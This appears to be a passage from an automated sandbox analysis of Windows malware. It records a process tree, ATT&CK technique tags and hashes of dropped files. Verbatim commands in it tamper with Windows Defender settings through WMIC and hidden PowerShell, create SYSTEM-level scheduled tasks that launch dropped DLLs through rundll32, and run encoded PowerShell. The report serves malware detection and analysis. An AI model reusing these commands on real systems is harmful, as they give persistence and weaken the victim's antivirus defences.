C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2004
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2024
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OniiUkVuU\xpcHPg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yDlQlQjTItyRqSH" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yDlQlQjTItyRqSH2" /F /xml "C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yDlQlQjTItyRqSH"3⤵PID:840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yDlQlQjTItyRqSH"3⤵PID:1988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JTZgHJltaGFKim" /F /xml "C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ebqgbGspXpXbN2" /F /xml "C:\ProgramData\RfQdYYQjhFJxkqVB\qWvhJeI.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fKsAjLTIAPWjkpmTj2" /F /xml "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "etkoUubEiiZzrHIDvkg2" /F /xml "C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DxfwWIkYFsDOIQKWf" /SC once /ST 04:28:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll\",#1 /wKdidbma 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "DxfwWIkYFsDOIQKWf"3⤵PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "akamOyUwOLVWEybrw"3⤵PID:2456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 15563⤵
- Loads dropped DLL
- Program crash
PID:2312
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 5254032⤵PID:2436
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll",#1 /wKdidbma 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1104 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DxfwWIkYFsDOIQKWf"4⤵PID:1772
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {46099B70-78A5-46BF-95EC-F9E2C0113173} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3028
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2040
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2356
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1008
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2696
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50fa3ee4d9e000ab80a8377412e40aea5
SHA1234952aa8b42c7bee376f18719b7c3997e343a2c
SHA25665170c66c742eea1b9dda450e10a2c61a4ca7f54ba9542251aa9f3cc917cdcc0
SHA5121cea62f5d00370ddce0c5a80ad64d16603dc667a168d763dd0d4ab912482281ea93800cf3e94440ec4201a4e1f3dee81c60ea9653e9ca78e2ae86e0124849a2d
-
Filesize
2KB
MD55f73e487983b4078b7a4e0ce779ae659
SHA15a7b2dc95cffd2be91ae120d6adf18edadde41a1
SHA2560d0eb0e1e51e93f83ec4b78c229d6e0ec96992b35357d061de1a650f6eb93ab6
SHA5129e5c928113a13a6e49162645264b14e0b08c25da0a23779189a41c113a82a66b38ee8a1b72208917d99d1e5ea0b3fb4aa9272c2cf8ee152fe7efeeb2862deb06
-
Filesize
2KB
MD58bed20c1e99dceb6c33358baac76c83c
SHA14b0fd8d39dff2c267e4bc2f20ffa5929cf240c88
SHA256c0e4495fcf860f7d6d996029f1ee92c97909d8734a52517985fd956c11c3745c
SHA512206689d889b79233f15c6d9a7a695205cfb3974db2311364d2c7421d01703d080be7965e8caf42e6cca6d6110cbd23495cb73101adcae6008168c408efcb53dd
-
Filesize
2KB
MD53fe455cfcd6e5dd975d9f187fb65cd34
SHA1656fdba3928bc531ec141dcfdaa1a44d7afa2333
SHA256981aa67ca99c3a33857e9a8dc90fcebb484c4b11dd8376d72807b30a7d304c84
SHA512c64950a01e922407343d69ad6438bd1797b1bb60500b781face781e1317799dba2e5b5459fc839d3362cd84a886e23b45a7605a380d9bcb6195d5e32a669faa0
-
Filesize
2.0MB
MD572fdf8c3aa0291d4a1fc62fe5094f6c3
SHA1113a9cd974719e09496a7d5d679e50aa1e07dec1
SHA256e4bd8e2d233fbfe9a82acac861e72a283e328304af9d1ec3b0d51587f8536018
SHA5126d91d6e40d3f9e228bb63703a99e1c691dc813346f449a60801d034e768905deda23a1676f5b7577f51af869c7ee3c7805397dc7bba0de08cba3931c9adf74a1
-
Filesize
2KB
MD52e43d9caee317be772d5865044ebd599
SHA1ea580b7e30297260ac8f7d2e32dd58136c9f3f50
SHA25692c5ce1008a77e6a337c722e59840dd0b19535bddaf89989cdb108f8f408150e
SHA5128e52863f137b0541ef54d6a94900d2cf90133a9001c6aad1da9b3ab6286fdad9dc2dc28334f05aacd143f97180de575ce528246dc12107e777064301f56aac91
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD589435c5bc9dfda06de8f396f8a0d81b4
SHA11a27ae517a0780341c8da8ffe73f4faffe938af2
SHA256b3a8874bcb56ceb3716acf384b51909584f818f0c00b38e0ad577e430100a850
SHA512d030c0f4e40255ed5be71823890ddc0571ef889bd45da80b8b2ec2a5fe1977c3d5101e5cc0a292b464edbf5a9ce5dc2abc7297df4e7a93d1792f5c5265349b9b
-
Filesize
28KB
MD5be2e808ba83ddd46589230269c09349e
SHA1bc0910ddc43b156b4500b98482e42fe33c2be115
SHA256ea81cc656e59a1c93bc2689b3904098b8b84aa908993acadcb74dd8ecb657ff4
SHA5123c8759d477e63dd186f137c9d5e53993843bdff3dad77dfc7bea6d9c71276dc3b28c2b1758d8119499cc8de9bdc429c008baf695433a3382ff3e029fa39a03da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5068ec4d21f758f843bbacaaae9fd4dbd
SHA12e5403c2be065482c564316fba44e72694adb3ad
SHA2564de992193cdd56f6d5ad2b40f11e616d92a2f559e916709ce5519e9ae4a97fa2
SHA5127d9b06112286e8f7cc31b8620e266156869a00e1b8ac8d63278af2f17696328982c1aaa52795ad5cbdfb870e5c1e73038a09c61b3f926cd3e658f3d7943bf795
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGQY2JCD3RR2IV34YIY9.temp
Filesize7KB
MD5484b85bac5416ab7c6176e5007578d58
SHA11c9b18855954d435528b553e9ec36628b23b4c72
SHA256809524c9732c57fa5ce87dd80eeef6bbdc5429fcbe79dc48138994a5d7a308da
SHA512e16def92b77df8aba6cbb382097ae111dfbbc4e63fcbf01cab6c63c3fdbee838460bbb771d7a0ac81b4b26f0aecdb32c5c90ffba8db1203dd90c5b793fea461b
-
Filesize
7KB
MD5e824537284aef6f669e36d56a9b9b762
SHA153ec878c15388fdb4e01f754d5f53e968851fc0c
SHA25653d6ee650158647c186941019fdc0593d91568fb2a7fa9e3a4d8c21c73c07527
SHA512de0d57725890728b6e078c1bb05c4e7fd1836e501ec8e188913066a91f6ee9c36d4dc9e33c0e9b2373c0ce12751a6e2ed29855015ff23a7ff77ec01afdbf6b12
-
Filesize
9KB
MD5838a6d63c3a927d217af6e2237ff9d0a
SHA140f6ab07322fc4c6d03e5783b20fbe0f9334c79a
SHA25618db848096e080dcb7d0af3334e2bacc2f80347c0b35df6812856020d03e9b21
SHA5120dd1e102d64e58879228e9d6a27980ef8aa9fe8b51b13d045a4f14a098b6e8629f2123ee64869bc3f0d813d297682ed78f87adc8fdb4ecab1153558d8a13a2f6
-
Filesize
5KB
MD5fe6a7fa86ce140d679b064af06b23da0
SHA1dec23a9ac5c7016f0f7138b0f01a9303f9656ae3
SHA2564e91f35ba55feae7fc1a838dec9db840c96b73e0875bcfb8513e111bf88e43df
SHA5126767722bfcb6bb8dbe9b80d9c298770bdf904b6354e567d161e5c2b29df7f14f9c623e5ea5f8cfbd3ebd0c79d085fcb50a60bac3974ee2c35943de6d5dd858fd
-
Filesize
6.4MB
MD5b6c0ddbcd0713b164497514c4d908831
SHA188638a95176133465505bea6f780e952e20e0217
SHA2563690ea841d737d1505221476dcba9574e0361459d59eb1103d74b99b56ff2d76
SHA512c85b8ea406f2d5bd6f73903cdcf66d6bd7e84e7a374b8e3051a4bb479890ef34a0735883b6b84df5f9181632ef198a096812d9c08752320c75acc13024007004
-
Filesize
6.7MB
MD5115546cac410b9675cb9347e7cf7d64a
SHA11302b93e02fae2423d22c47e82cab233c07c5f7b
SHA2560dbe6c46489c63ff8c3638be1ea4657a226978643fd3411df5b56196a052e67c
SHA5125d6db68fe38e7797fea57ee06397365c063179fed0855b4728a18bfa2f8785fd2190a9b3e14e39e2d66ba04410066b313a3169cebfa11c3e0c70e902b9f89a9f
-
Filesize
6.4MB
MD5e1e4349f77244f2529eca36471a1b3c4
SHA1e71982e57783d0cdc2464b0033f1636076b8ebb3
SHA25645fe506d58bd345b130409725086d7ecbcd237731b793ff5fc8ee087c7b3ed56
SHA512b2f087bab7963b17a0676432bc54494ed5e30950d63bd5d61f128557235991b5bb74b05e851a4f1fdf97b3af9b0559d817f77046c0a57b896ab7f5fd833f1f7c